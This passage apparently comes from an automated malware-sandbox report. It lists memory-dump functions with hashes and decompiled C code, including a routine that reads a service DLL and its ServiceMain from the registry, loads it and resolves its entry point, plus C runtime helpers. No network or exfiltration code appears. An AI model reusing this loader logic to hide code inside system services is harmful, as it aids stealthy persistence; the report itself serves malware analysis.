                            Uniqueness Score: -1.00%

                            Function 01329760, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ee09c932602b83caa5d5414624eaa21d22255c12241004c65b6140e7c2b61fdc
                            • Instruction ID: 8ddd61ddc03fe26af7cec5ca02eee35ce25d8cf0c87b905e73de0c9bcd69e879
                            • Opcode Fuzzy Hash: ee09c932602b83caa5d5414624eaa21d22255c12241004c65b6140e7c2b61fdc
                            • Instruction Fuzzy Hash: 0290027521100403D500619955087070005A7D0246F91D421A0414559DD69688657165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329610, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b04b5dffca00bff5105971dbcac8a1086b71face95f0df432c1c8ebf3702db15
                            • Instruction ID: d0ca403cc8aafabbe71acfd019aebda1f4b33ba82dfbce3efe652600844e6659
                            • Opcode Fuzzy Hash: b04b5dffca00bff5105971dbcac8a1086b71face95f0df432c1c8ebf3702db15
                            • Instruction Fuzzy Hash: 1390027561500802D550719944147460005A7D0346F91C021A0014655DC7958A6976E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329650, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd89974400d7ee4be6723d1b9313c6b261a05d3d24d4f455044c97733c425163
                            • Instruction ID: eef32acd636c1a88be0346bdc7e3eaeef52570fd67d05910a6591fe58a81eb34
                            • Opcode Fuzzy Hash: fd89974400d7ee4be6723d1b9313c6b261a05d3d24d4f455044c97733c425163
                            • Instruction Fuzzy Hash: 0290027521504842D54071994404A460015A7D034AF91C021A0054695DD6658D69B6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013296D0, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00d27bf6ca6a726c51cc12efbc71fc708cfc90bf4eb57a350c53791f41a98ff3
                            • Instruction ID: 65b39182719b61536f94ae461e61f18aa969198ea0f856cd5d77e810ed49120c
                            • Opcode Fuzzy Hash: 00d27bf6ca6a726c51cc12efbc71fc708cfc90bf4eb57a350c53791f41a98ff3
                            • Instruction Fuzzy Hash: A190027521100842D50061994404B460005A7E0346F91C026A0114655DC655C8657565
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329670, Relevance: .0, Instructions: 2COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction ID: 0fdbf9c0ffafe6d95b1cd2c9cfbf7f013bd92a05c93e225781ce300f494b31dc
                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B1160, Relevance: 79.0, APIs: 35, Strings: 10, Instructions: 225memorystringregistryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E008B1160(WCHAR* _a4, WCHAR** _a8) {
				void* _v8;
				void* _v12;
				long _v16;
				struct HINSTANCE__* _v20;
				void* _v24;
				signed int _v28;
				WCHAR* _v32;
				_Unknown_base(*)()* _v36;
				void* _v40;
				int _v44;
				long _v48;
				int _t82;
				int _t83;
				int _t85;
				int _t86;
				long _t125;
				void* _t134;

				_v12 = 0;
				_v8 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v36 = 0;
				_v48 = 0;
				_t82 = lstrlenW(L"System\\CurrentControlSet\\Services");
				_t83 = lstrlenW("\\");
				_t85 = lstrlenW(_a4);
				_t86 = lstrlenW("\\");
				_t11 = lstrlenW(L"Parameters") + 1; // 0x1
				_v28 = _t82 + _t83 + _t85 + _t86 + _t11;
				_v8 = HeapAlloc(GetProcessHeap(), 0, _v28 << 1);
				lstrcpyW(_v8, L"System\\CurrentControlSet\\Services");
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, _a4);
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, L"Parameters");
				 *((short*)(_v8 + _v28 * 2 - 2)) = 0;
				_v16 = RegOpenKeyExW(0x80000002, _v8, 0, 0x20019,  &_v12);
				if(_v16 == 0) {
					_v40 = E008B1000(_v12, L"ServiceDll");
					if(_v40 != 0) {
						_v32 = E008B10B0(_v40);
						if(_v32 != 0) {
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, 0,  &_v44);
							if(_v16 != 0) {
								L10:
								RegCloseKey(_v12);
								_v20 = LoadLibraryExW(_v32, 0, 8);
								if(_v20 != 0) {
									if(_v24 == 0) {
										_v36 = GetProcAddress(_v20, "ServiceMain");
									} else {
										_v36 = GetProcAddress(_v20, _v24);
									}
									if(_v36 != 0) {
										GetProcAddress(_v20, "SvchostPushServiceGlobals");
										 *_a8 = _a4;
										_a8[1] = _v36;
										_v48 = 1;
									} else {
										FreeLibrary(_v20);
									}
								} else {
									_t125 = GetLastError();
									0x8b0000(_v32, _t125);
									0x8b0000("failed to load library %s, err=%u\n", _t125);
								}
								goto L18;
							}
							_v28 = _v44 + 1;
							_v24 = HeapAlloc(GetProcessHeap(), 0, _v28);
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, _v24,  &_v44);
							if(_v16 == 0) {
								 *((char*)(_v24 + _v28 - 1)) = 0;
								goto L10;
							}
							RegCloseKey(_v12);
							goto L18;
						}
						RegCloseKey(_v12);
						goto L18;
					}
					RegCloseKey(_v12);
					goto L18;
				} else {
					_t134 = _v8;
					0x8b0000(_t134, _v16);
					0x8b0000("cannot open key %s, err=%d\n", _t134);
					L18:
					HeapFree(GetProcessHeap(), 0, _v8);
					HeapFree(GetProcessHeap(), 0, _v40);
					HeapFree(GetProcessHeap(), 0, _v32);
					HeapFree(GetProcessHeap(), 0, _v24);
					return _v48;
				}
			}




















                            0x008b1167
                            0x008b116e
                            0x008b1175
                            0x008b117c
                            0x008b1183
                            0x008b118a
                            0x008b1191
                            0x008b1198
                            0x008b11a4
                            0x008b11b1
                            0x008b11bd
                            0x008b11ca
                            0x008b11dd
                            0x008b11e1
                            0x008b11f9
                            0x008b1205
                            0x008b1214
                            0x008b1222
                            0x008b1231
                            0x008b1240
                            0x008b124e
                            0x008b126d
                            0x008b1274
                            0x008b12a1
                            0x008b12a8
                            0x008b12c2
                            0x008b12c9
                            0x008b12f3
                            0x008b12fa
                            0x008b1358
                            0x008b135c
                            0x008b1370
                            0x008b1377
                            0x008b139a
                            0x008b13be
                            0x008b139c
                            0x008b13aa
                            0x008b13aa
                            0x008b13c5
                            0x008b13dc
                            0x008b13e8
                            0x008b13f0
                            0x008b13f3
                            0x008b13c7
                            0x008b13cb
                            0x008b13cb
                            0x008b1379
                            0x008b1379
                            0x008b1384
                            0x008b138f
                            0x008b138f
                            0x00000000
                            0x008b1377
                            0x008b1302
                            0x008b1318
                            0x008b1336
                            0x008b133d
                            0x008b1354
                            0x00000000
                            0x008b1354
                            0x008b1343
                            0x00000000
                            0x008b1343
                            0x008b12cf
                            0x00000000
                            0x008b12cf
                            0x008b12ae
                            0x00000000
                            0x008b1276
                            0x008b127a
                            0x008b127e
                            0x008b1289
                            0x008b13fa
                            0x008b1407
                            0x008b141a
                            0x008b142d
                            0x008b1440
                            0x008b144d
                            0x008b144d

                            APIs
                            • lstrlenW.KERNEL32(System\CurrentControlSet\Services), ref: 008B11A4
                            • lstrlenW.KERNEL32(008C2048), ref: 008B11B1
                            • lstrlenW.KERNEL32(00000000), ref: 008B11BD
                            • lstrlenW.KERNEL32(008C204C), ref: 008B11CA
                            • lstrlenW.KERNEL32(Parameters), ref: 008B11D7
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B11EC
                            • HeapAlloc.KERNEL32(00000000), ref: 008B11F3
                            • lstrcpyW.KERNEL32 ref: 008B1205
                            • lstrcatW.KERNEL32(00000000,008C2068), ref: 008B1214
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 008B1222
                            • lstrcatW.KERNEL32(00000000,008C206C), ref: 008B1231
                            • lstrcatW.KERNEL32(00000000,Parameters), ref: 008B1240
                            • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 008B1267
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B12AE
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1400
                            • HeapFree.KERNEL32(00000000), ref: 008B1407
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1413
                            • HeapFree.KERNEL32(00000000), ref: 008B141A
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1426
                            • HeapFree.KERNEL32(00000000), ref: 008B142D
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1439
                            • HeapFree.KERNEL32(00000000), ref: 008B1440
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Processlstrlen$Freelstrcat$AllocCloseOpenlstrcpy
                            • String ID: Parameters$Parameters$ServiceDll$ServiceMain$ServiceMain$ServiceMain$SvchostPushServiceGlobals$System\CurrentControlSet\Services$cannot open key %s, err=%d$failed to load library %s, err=%u
                            • API String ID: 922840199-2032176762
                            • Opcode ID: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction ID: 546e82ee9e0dd8c2eb5b87843333ba4a74397b89cb68e9d7899910110b0f6c77
                            • Opcode Fuzzy Hash: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction Fuzzy Hash: 5D91D575900608FFDB04EBE4D859BAEBBB4FB48701F108619E611AA390E7799942CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B10B0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 60memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E008B10B0(WCHAR* _a4) {
				long _v8;
				void* _v12;
				long _t25;
				long _t30;

				_v8 = 0;
				_v8 = ExpandEnvironmentStringsW(_a4, 0, _v8);
				if(_v8 != 0) {
					_t19 = _v8;
					_t9 = _t19 + 2; // 0x2
					_v12 = HeapAlloc(GetProcessHeap(), 0, _v8 + _t9);
					if(ExpandEnvironmentStringsW(_a4, _v12, _v8) != 0) {
						return _v12;
					}
					_t25 = GetLastError();
					0x8b0000(_a4, _t25);
					0x8b0000("cannot expand env vars in %s: %u\n", _t25);
					HeapFree(GetProcessHeap(), 0, _v12);
					return 0;
				}
				_t30 = GetLastError();
				0x8b0000(_a4, _t30);
				0x8b0000("cannot expand env vars in %s: %u\n", _t30);
				return 0;
			}







                            0x008b10b6
                            0x008b10cd
                            0x008b10d4
                            0x008b10f5
                            0x008b10f8
                            0x008b110c
                            0x008b1123
                            0x00000000
                            0x008b1157
                            0x008b1125
                            0x008b1130
                            0x008b113b
                            0x008b114d
                            0x00000000
                            0x008b1153
                            0x008b10d6
                            0x008b10e1
                            0x008b10ec
                            0x00000000

                            APIs
                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 008B10C7
                            • GetLastError.KERNEL32 ref: 008B10D6
                            • GetProcessHeap.KERNEL32(00000000,00000002), ref: 008B10FF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1106
                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000000), ref: 008B111B
                            • GetLastError.KERNEL32 ref: 008B1125
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1146
                            • HeapFree.KERNEL32(00000000), ref: 008B114D
                            Strings
                            • cannot expand env vars in %s: %u, xrefs: 008B10E7
                            • cannot expand env vars in %s: %u, xrefs: 008B1136
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$EnvironmentErrorExpandLastProcessStrings$AllocFree
                            • String ID: cannot expand env vars in %s: %u$cannot expand env vars in %s: %u
                            • API String ID: 3773870257-3849838887
                            • Opcode ID: a3c19922889e737f1f6cb10d266250579e07856bd4b7fb3a93b3117b8501bb32
                            • Instruction ID: 926809ebca4903144a78b4abc0277840de2aaecbb1f29d761a9879a22ddcc61c
                            • Opcode Fuzzy Hash: a3c19922889e737f1f6cb10d266250579e07856bd4b7fb3a93b3117b8501bb32
                            • Instruction Fuzzy Hash: 8411EF75504608BFDB04FBA4DC59FAE7B78FB08301F104559FA09D6250E630DA429B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B15A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 43%
                            			E008B15A0(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t19;
				long _t22;

				_v16 = 0;
				_v12 = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v16);
				_v8 = _t19;
				if(_v8 == 0) {
					_v12 = E008B1000(_v16, _a4);
					_t22 = RegCloseKey(_v16);
					if(_v12 != 0) {
						_v8 = E008B1450(_v12);
						if(_v8 == 0) {
							HeapFree(GetProcessHeap(), 0, _v12);
						}
						return _v8;
					}
					0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
					0x8b0000(_a4, _t22);
					0x8b0000("cannot find registry value %s in %s\n", _t22);
					return 0;
				}
				0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _v8);
				0x8b0000("cannot open key %s, err=%d\n", _t19);
				return 0;
			}








                            0x008b15a6
                            0x008b15ad
                            0x008b15c9
                            0x008b15cf
                            0x008b15d6
                            0x008b1602
                            0x008b1609
                            0x008b1613
                            0x008b1641
                            0x008b1648
                            0x008b1657
                            0x008b1657
                            0x00000000
                            0x008b165d
                            0x008b161a
                            0x008b1624
                            0x008b162f
                            0x00000000
                            0x008b1634
                            0x008b15e1
                            0x008b15ec
                            0x00000000

                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 008B15C9
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B1609
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseOpen
                            • String ID: Software\Microsoft\Windows NT\CurrentVersion\Svchost$cannot find registry value %s in %s$cannot open key %s, err=%d
                            • API String ID: 47109696-3561747105
                            • Opcode ID: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction ID: 56a1e3bfe9471b6b6cbd39db1b112954e74d6aeb04a3b6ac16928930317e271f
                            • Opcode Fuzzy Hash: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction Fuzzy Hash: CD11F97494020CFFDB04FBA8C85AFDEB778FB44701F208158B615EA391EA74AA419B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B2E1E, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E008B2E1E(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E008B2FCD(_t3);
				if(E008B4268() != 0) {
					_t6 = E008B3D79(E008B2BAF);
					 *0x8c21a8 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E008B42EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E008B2E94();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E008B3DD5( *0x8c21a8, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E008B2D6B(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E008B2E94();
					return 0;
				}
			}








                            0x008b2e1e
                            0x008b2e2a
                            0x008b2e39
                            0x008b2e3e
                            0x008b2e44
                            0x008b2e47
                            0x00000000
                            0x008b2e49
                            0x008b2e56
                            0x008b2e5a
                            0x008b2e5c
                            0x008b2e8b
                            0x008b2e8b
                            0x008b2e90
                            0x008b2e93
                            0x008b2e5e
                            0x008b2e6c
                            0x008b2e6e
                            0x00000000
                            0x008b2e70
                            0x008b2e70
                            0x008b2e72
                            0x008b2e73
                            0x008b2e7a
                            0x008b2e80
                            0x008b2e84
                            0x008b2e88
                            0x008b2e8a
                            0x008b2e8a
                            0x008b2e6e
                            0x008b2e5c
                            0x008b2e2c
                            0x008b2e2c
                            0x008b2e2c
                            0x008b2e33
                            0x008b2e33

                            APIs
                            • __init_pointers.LIBCMT ref: 008B2E1E
                              • Part of subcall function 008B2FCD: EncodePointer.KERNEL32(00000000,?,008B2E23,008B28F2,008C10E8,00000014), ref: 008B2FD0
                              • Part of subcall function 008B2FCD: __initp_misc_winsig.LIBCMT ref: 008B2FEB
                              • Part of subcall function 008B2FCD: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008B3E6C
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008B3E80
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008B3E93
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008B3EA6
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008B3EB9
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008B3ECC
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008B3EDF
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008B3EF2
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008B3F05
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008B3F18
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008B3F2B
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008B3F3E
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008B3F51
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008B3F64
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008B3F77
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008B3F8A
                            • __mtinitlocks.LIBCMT ref: 008B2E23
                            • __mtterm.LIBCMT ref: 008B2E2C
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B4182
                              • Part of subcall function 008B2E94: _free.LIBCMT ref: 008B4189
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(008C21F8,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B41AB
                            • __calloc_crt.LIBCMT ref: 008B2E51
                            • __initptd.LIBCMT ref: 008B2E73
                            • GetCurrentThreadId.KERNEL32 ref: 008B2E7A
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction ID: 09fe444c1aebb2a8687c7674bbef77b9404be5afba650a76ccdb69acaa45b875
                            • Opcode Fuzzy Hash: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction Fuzzy Hash: 45F06D3251961269E23876B97C036CB3B90FF01731B25066AF4A0D93D7EE20D8428162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B1000, Relevance: 9.1, APIs: 6, Instructions: 66memoryregistryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B1000(void* _a4, short* _a8) {
				void* _v8;
				long _v12;
				unsigned int _v16;
				int _v20;
				int _v24;

				_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, 0,  &_v20);
				if(_v12 == 0) {
					_v16 = _v20 + 4;
					_v8 = HeapAlloc(GetProcessHeap(), 0, _v16);
					_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, _v8,  &_v20);
					if(_v12 == 0) {
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 2)) = 0;
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 4)) = 0;
						return _v8;
					}
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0;
				}
				return 0;
			}








                            0x008b1020
                            0x008b1027
                            0x008b1033
                            0x008b1049
                            0x008b1068
                            0x008b106f
                            0x008b1092
                            0x008b10a1
                            0x00000000
                            0x008b10a6
                            0x008b107e
                            0x00000000
                            0x008b1084
                            0x00000000

                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008B101A
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B103C
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1043
                            • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 008B1062
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1077
                            • HeapFree.KERNEL32(00000000), ref: 008B107E
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$ProcessQueryValue$AllocFree
                            • String ID:
                            • API String ID: 1095795037-0
                            • Opcode ID: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction ID: c82e3efd7b83f8e584ea1e2c8a59bc8ad1aacf441dc26026e660beaa5907b78e
                            • Opcode Fuzzy Hash: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction Fuzzy Hash: 0B21EA75A14608FFDB04EFE8D959FAEB7B8FF48300F108559E606DB290D6309A46CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B2EB1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E008B2EB1(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                            0x008b2eb5
                            0x008b2ec0
                            0x008b2ec8
                            0x008b2ed2
                            0x008b2eda
                            0x00000000
                            0x008b2edf
                            0x008b2eda
                            0x008b2ee4

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008B2EF0,00000000,?,008B6374,000000FF,0000001E,00000000,00000000,00000000,?,008B434C), ref: 008B2EC0
                            • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 008B2ED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 1646373207-1276376045
                            • Opcode ID: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction ID: 17c6bd8c73dd649e14282f36a3475105b85eb038516799d2c43be7428d088892
                            • Opcode Fuzzy Hash: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction Fuzzy Hash: 7CD01231240308BBDF50ABA2DC05FAE7BACFB04741F000165BD18D4351FA61DE519661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B853A, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B853A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E008B473F( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E008B847C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E008B5065(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
